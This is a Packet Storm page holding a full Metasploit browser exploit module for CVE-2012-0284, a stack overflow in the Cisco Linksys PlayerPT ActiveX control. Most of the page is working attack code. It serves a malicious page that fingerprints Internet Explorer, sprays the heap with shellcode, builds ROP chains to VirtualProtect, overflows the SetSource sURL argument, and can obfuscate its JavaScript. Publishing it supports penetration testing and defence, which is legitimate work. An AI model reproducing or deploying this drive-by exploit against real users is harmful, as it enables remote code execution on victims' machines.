exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow

Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow
Posted Aug 3, 2012
Authored by Carsten Eiram, juan | Site metasploit.com

This Metasploit module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in the SetSource method, when handling a specially crafted sURL argument, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page.

tags | exploit, web, overflow, code execution
systems | cisco
advisories | CVE-2012-0284
SHA-256 | 5a88ff9a13dc712f648150200591ec804a09cb0631600c4db7449f3c17604a4b

Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "9.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
:method => "SetSource",
:rank => NormalRanking
})


def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15
as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ
Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in
the SetSource method, when handling a specially crafted sURL argument, allows to
trigger a stack based buffer overflow which leads to code execution under the
context of the user visiting a malicious web page.
},
'Author' =>
[
'Carsten Eiram', # Vuln discovery
'juan' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0284' ],
[ 'BID', '54588' ],
[ 'URL', 'http://secunia.com/secunia_research/2012-25/' ],

],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',

},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[
'IE 6 on Windows XP SP3',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x0c0c0c0c,
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 7 on Windows XP SP3 / Windows Vista SP2',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x0c0c0c0c,
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 8 on Windows XP SP3',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x77c3546b, # ret from msvcrt
'StackPivot_1' => 0x77c3546a, # pop ebp; ret from msvcrt
'StackPivot_2' => 0x77c35468, # mov esp,ebp; pop ebp; ret from msvcrt
'Rop' => :msvcrt,
'RopChainOffset' => '0x5f4',
'RandomHeap' => false
}
],
[
'IE 8 with Java 6 on Windows XP SP3',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x7c3424f2, # ret from msvcr71.dll
'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll
'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll
'Rop' => :jre,
'RopChainOffset' => '0x5f4',
'RandomHeap' => false
}
],
[
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
{
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'Ret' => 0x7c3424f2, # ret from msvcr71.dll
'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll
'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll
'Rop' => :jre,
'RopChainOffset' => '0x5f4',
'RandomHeap' => false
}
],
[
'IE 9 with Java 6 on Windows 7 SP1',
{
'SprayBlocks' => 0x1000,
'SprayOffset' => '0x0',
'Ret' => 0x7c3424f2, # ret from msvcr71.dll
'StackPivot_1' => 0x7c3424f1, # pop ebp; ret from msvcr71.dll
'StackPivot_2' => 0x7c3424ef, # mov esp,ebp; pop ebp; ret from msvcr71.dll
'Rop' => :jre,
'RopChainOffset' => '0x5fe',
'RandomHeap' => true,
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 17 2012',
'DefaultTarget' => 0))

register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)

end

def get_easy_spray(t, js_code, js_nops)

spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");

while (nops.length < 0x80000) nops += nops;

var offset = nops.substring(0, #{t['SprayOffset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);

heap_obj.gc();
for (var z=1; z < #{t['SprayBlocks']}; z++) {
heap_obj.alloc(block);
}

JS

return spray

end

def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)

spray = <<-JS

var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
var nops_90 = unescape("#{js_90_nops}");
var rop_chain = unescape("#{js_rop}");

while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;

var offset = nops.substring(0, #{t['SprayOffset']});
var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);


while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);


heap_obj.gc();
for (var z=1; z < #{t['SprayBlocks']}; z++) {
heap_obj.alloc(block);
}

JS

return spray

end

# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_rop, js_code, js_90_nops)

spray = <<-JS

function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}

function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}

var heap_obj = new heapLib.ie(0x10000);

var rop = unescape("#{js_rop}");
var code = unescape("#{js_code}");
var nops_90 = unescape("#{js_90_nops}");

while (nops_90.length < 0x80000) nops_90 += nops_90;

var offset_length = #{t['RopChainOffset']};

for (var i=0; i < #{t['SprayBlocks']}; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length - code.length);
var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}

JS

return spray
end


def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end

def nop
return make_nops(4).unpack("V").first
end

def get_stack_pivot(t)
stack_pivot = [
junk,
junk,
junk,
junk,
junk,
t['StackPivot_1'], # pop ebp # ret # ESP points here after controlling EIP with overflow
0x0c0c0c08, # ebp
t['StackPivot_2'] # mov esp,ebp # pop ebp # ret
].pack("V*")

return stack_pivot
end

def get_rop_chain(t)

# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop =
[
0x77C21891, # POP ESI # RETN
0x0c0c0c04, # ESI
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c, # XCHG EAX,ESI # ADD BYTE PTR [EAX],AL # RETN
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
0x00001000, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")

when :jre
print_status("Using JRE ROP")
rop =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000, # (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0x00000040, # flNewProtect
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end

return rop
end

def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'

if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows Vista SP2
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6] #IE 9 on Windows 7 SP1
else
return nil
end
end

def on_request_uri(cli, request)

agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")

my_target = get_target(agent)

# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end

p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

if not my_target['Rop'].nil?
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
end

js = ""

if my_target['RandomHeap']
js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
elsif not my_target['Rop'].nil?
js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
else
js = get_easy_spray(my_target, js_code, js_nops)
end

js = heaplib(js, {:noobfu => true})

if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

sploit = "http://"
sploit << "\x0c" * 261
sploit << [my_target.ret].pack("V")
if not my_target['Rop'].nil?
sploit << get_stack_pivot(my_target)
end
sploit << "/img/video.asf"

html = <<-MYHTML
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
<script>
obj.SetSource("#{sploit}","mpeg","","","");
</script>
</body>
</html>
MYHTML

html = html.gsub(/^\t\t/, '')

print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close